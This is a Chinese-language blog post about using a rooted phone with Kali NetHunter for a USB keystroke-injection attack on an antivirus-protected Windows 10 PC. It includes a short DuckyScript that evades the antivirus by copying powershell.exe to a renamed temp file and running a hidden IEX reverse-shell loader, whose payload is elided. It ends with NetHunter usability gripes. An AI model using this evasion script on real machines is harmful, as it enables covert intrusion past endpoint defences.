废话
前阵子手机炸了,而后刷了一个比较新的LinageOS。4.x的内核,有Gadget ConfigFS支持。
刷机,Magisk,Xposed,一路刷上。
肯定要整一个NetHunter玩玩啦,那么就去KALI官网下载了一个zip,刷上就好。如何安装去看官方文档。
本文会尝试把整套HID攻击都放在手机和一条充电用的线上面。
至于手机安装NetHunter后出现的一些问题,比如终端很不好用,SaftyNet问题,我会写在后面。
山穷水复
目标:windows 10,安装了某绒。
先用USB arsenal
创建hid设备,然后配置了一个meterpreter的powershell。
我们只需要下载并执行它就好。
HID attack
选项卡的功能不好用。没有成功。因为这些功能不怎么灵活。攻击脚本都是写死的。
我只能用DuckHunter
自己编写一段脚本进行攻击,但是没有成功:
在隐藏运行powershell的时候被拦截下来,就算跳过这一步,执行的时候也会被拦截。
重新思考这个问题
虽然说,HID攻击是我可以接触到靶机的情况,但是为了隐蔽过程,我总不能坐下来,抽出键盘,然后右键杀软托盘icon,点一个退出,再选退出1个小时…….
首先,肯定是杀软监控了powershell这个程序的活动并且进行了拦截。甚至在IEX之前就检查了从网络上下载的脚本。
于是我想着变形HID输入的脚本,并且攻击载荷也要换。
柳暗花明
我后面给powershell变形了好几次,但是隐藏运行这点绕不过去。只要隐藏运行,杀软必拦截。
不隐藏的话蓝窗会闪很久,容易引起警觉。
而且对于攻击载荷的拦截就是玄学。
我看了网上有人解决方案是自己写了一个程序,能接受参数并调用一些API。可是这对于HID攻击并不友好。因为攻击进行时间应该越短越好,下载文件越大越不可控,闪过的东西越多越容易暴露。
powershell-backdoor-generator
首先稳定载荷,我后来用了:powershell-backdoor-generator
这个项目蛮有意思,目前挺新的,可以生成一个被混淆的powershell脚本。另一方面这个脚本也可以生成支持Rubber Ducky脚本的运行命令。同时开启反弹shell监听和一个http服务器。前者监听靶机上线,后者可以配合HID下载攻击载荷。
由于项目比较新,并且存在混淆,杀软不会报毒。
我可以直接把这个工具安装在手机里:
绕过隐藏执行拦截
其实这个很有意思,上文才说有人写程序调用API绕过。
而我直接复制了powershell.exe到一个临时路径,并且修改了名字。
DELAY 200
GUI r
DELAY 150
STRING cmd /c "C:\WINDOWS\System32\PowerShell\v1.0\PowerShell.exe %TEMP%\p.exe"
ENTER
DELAY 500
GUI r
DELAY 150
STRING %TEMP%\p.exe -w hidden IEX blablablablabla.......
因为PowerShell.exe位置比较固定,于是我用了这招复制了powershell.exe拷贝到了临时文件目录命名为p.exe
而后用p.exe执行就绕过了杀软。
这样会弹出两次运行窗口,但是都是很快的一闪而过,整个过程大概1秒钟。
我不知道这个方法能活多久。
HID攻击拿到这个shell只是第一步,机会只有一次,而且很容易掉链子。做到一击必杀有点困难。
谈谈NetHunter的感受
我不觉得普通手机装NetHunter特别的实用。除非你有合适的网卡。
里面很多现成工具很难做到开箱即用,和当时的csploit,dsploit什么的不好比。
你说它功能强大吧,也就那样。毕竟手机都root了,Termux也可以装很多工具。
我完全可以在Termux中启动一个Bettercap的web ui来玩MITI,NetHunter的ui设计真的一言难尽。
Termux也可以安装Metasploit,也可以装Nmap。
然后自带的终端特别难用,折腾半天不知道怎么ctrl+c,复制出点文本也都很难。
本文用的Duck Hunter貌似没有完美兼容Rubber Ducky语法,F1-F12键不能用。甚至自带的脚本都不兼容。DuckHunter写了脚本换到USB arsenal启动HID再换回来,之前的就白写了。自带的保存按钮能保存,但是又不能加载你保存的代码。
还是那句话,除非你有合适的网卡,否则没必要。
SafetyNet无法通过的问题
这个问题着实坑了我一下,当时Safetynet死活过不了,一直报RESTORE_TO_FACTORY_ROM
就算是刷了一些绕过工具依旧不行。
结果是因为NetHunter会禁用SELinux。必须去终端手动setenforce 1来解决。
NetHunter自带的终端太难用了,怎么办?
不只是我一个人吐槽这个问题,ctrl按不了,也没办法复制,这怎么用?
于是有人做了一个脚本,可以在Termux中打开Kali chroot。
boot-nethunter
安装NetHunter的chroot和Termux后用这个脚本,可以直接在Termux中使用。
Comments
(no comments...maybe you can be the first?)